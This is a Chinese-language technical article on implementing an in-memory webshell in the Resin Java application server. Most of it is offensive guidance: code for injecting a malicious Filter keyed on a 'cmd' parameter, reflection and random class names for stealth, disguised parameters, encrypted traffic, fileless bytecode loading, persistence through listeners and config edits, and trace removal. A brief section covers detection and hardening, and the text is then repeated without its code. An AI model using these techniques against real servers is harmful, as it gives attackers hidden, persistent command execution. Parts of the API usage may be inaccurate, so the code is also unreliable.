Resin内存马研究与实现技术详解

一、Resin基础认知

Resin是一款高性能的Java应用服务器，由Caucho Technology公司开发，具有以下核心特性：

轻量级设计，启动速度快
支持Servlet 3.0/JSP 2.2规范
内置Quercus PHP引擎
动态类加载机制

与Tomcat的关键差异：

类加载机制不同：Resin采用独特的动态类加载系统
架构设计差异：Resin的请求处理管道更简洁
内存管理：Resin对永久代(PermGen)的使用方式不同

二、Resin内存马实现原理

1. 核心切入点

Filter机制注入：通过动态添加Filter实现请求拦截
Servlet上下文操纵：修改Servlet映射关系
动态类加载利用：利用Resin的HotDeploy特性

2. 关键技术点

获取上下文环境：

com.caucho.server.webapp.WebApp webApp = 
    (com.caucho.server.webapp.WebApp)com.caucho.server.webapp.WebApp.getCurrent();

Filter注入流程：

// 创建恶意Filter类
public class EvilFilter implements Filter {
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) {
        // 恶意代码逻辑
        if (request.getParameter("cmd") != null) {
            // 执行命令代码
        }
        chain.doFilter(request, response);
    }
}

// 注入Filter
webApp.addFilter("evilFilter", new EvilFilter());
webApp.addFilterMapping("evilFilter", "/*");

三、技术细节处理

1. 内存驻留技术

防止GC回收：将Filter实例存储在静态变量中
线程绑定：通过ThreadLocal保持引用
双重注册：同时在Filter链的首尾位置注册

2. 隐蔽性增强

反射调用：

Method addFilterMethod = webApp.getClass().getMethod("addFilter", String.class, Filter.class);
addFilterMethod.invoke(webApp, "hiddenFilter", new EvilFilter());

动态类名生成：

String randomClassName = "Filter" + System.currentTimeMillis();

请求特征隐藏：

使用常见参数名如"id"、"token"等代替"cmd"
加密通信内容

3. 兼容性处理

// Resin版本适配
String resinVersion = com.caucho.Version.getVersion();
if (resinVersion.startsWith("4.")) {
    // Resin 4.x处理逻辑
} else {
    // 其他版本处理
}

四、防御检测方案

1. 检测手段

运行时检测：

# 列出所有注册的Filter
jmap -histo <pid> | grep Filter

内存分析：

使用MAT分析Resin堆内存
检查WebApp实例中的filterMappings属性

行为监控：

监控Filter.addFilter()等关键方法的调用

2. 防护措施

安全配置：

<!-- resin-web.xml -->
<web-app>
    <filter-mapping deny-unregistered-filters="true"/>
</web-app>

JVM防护：

-javaagent:security-agent.jar

五、高级利用技术

1. 无文件落地注入

// 通过类字节码直接注册
byte[] evilClassBytes = ...; // 恶意类字节码
ResinClassLoader loader = (ResinClassLoader)Thread.currentThread().getContextClassLoader();
Class evilClass = loader.defineClass("com.example.EvilFilter", evilClassBytes);

2. 持久化技术

注册ServletContextListener：

webApp.addListener("com.example.EvilListener");

修改resin.conf：

<web-app>
    <filter>
        <filter-name>evil</filter-name>
        <filter-class>com.example.EvilFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>evil</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
</web-app>

六、实战注意事项

环境适配：

不同Resin版本API可能有差异
注意ClassLoader隔离问题

异常处理：

try {
    // 注入代码
} catch (Throwable t) {
    // 静默处理异常
}

清理痕迹：

避免在堆栈跟踪中暴露类名
动态生成类名时避免使用可疑前缀

附录：Resin关键API参考

com.caucho.server.webapp.WebApp - 核心Web应用类
com.caucho.server.dispatch.FilterMapping - Filter映射管理
com.caucho.loader.DynamicClassLoader - 动态类加载器
com.caucho.config.Config - 配置管理接口

本技术文档仅用于安全研究目的，请勿用于非法用途。

Resin内存马研究与实现技术详解一、Resin基础认知 Resin是一款高性能的Java应用服务器，由Caucho Technology公司开发，具有以下核心特性：轻量级设计，启动速度快支持Servlet 3.0/JSP 2.2规范内置Quercus PHP引擎动态类加载机制与Tomcat的关键差异：类加载机制不同：Resin采用独特的动态类加载系统架构设计差异：Resin的请求处理管道更简洁内存管理：Resin对永久代(PermGen)的使用方式不同二、Resin内存马实现原理 1. 核心切入点 Filter机制注入：通过动态添加Filter实现请求拦截 Servlet上下文操纵：修改Servlet映射关系动态类加载利用：利用Resin的HotDeploy特性 2. 关键技术点获取上下文环境： Filter注入流程：三、技术细节处理 1. 内存驻留技术防止GC回收：将Filter实例存储在静态变量中线程绑定：通过ThreadLocal保持引用双重注册：同时在Filter链的首尾位置注册 2. 隐蔽性增强反射调用：动态类名生成：请求特征隐藏：使用常见参数名如"id"、"token"等代替"cmd" 加密通信内容 3. 兼容性处理四、防御检测方案 1. 检测手段运行时检测：内存分析：使用MAT分析Resin堆内存检查WebApp实例中的filterMappings属性行为监控：监控Filter.addFilter()等关键方法的调用 2. 防护措施安全配置： JVM防护：五、高级利用技术 1. 无文件落地注入 2. 持久化技术注册ServletContextListener ：修改resin.conf ：六、实战注意事项环境适配：不同Resin版本API可能有差异注意ClassLoader隔离问题异常处理：清理痕迹：避免在堆栈跟踪中暴露类名动态生成类名时避免使用可疑前缀附录：Resin关键API参考 com.caucho.server.webapp.WebApp - 核心Web应用类 com.caucho.server.dispatch.FilterMapping - Filter映射管理 com.caucho.loader.DynamicClassLoader - 动态类加载器 com.caucho.config.Config - 配置管理接口本技术文档仅用于安全研究目的，请勿用于非法用途。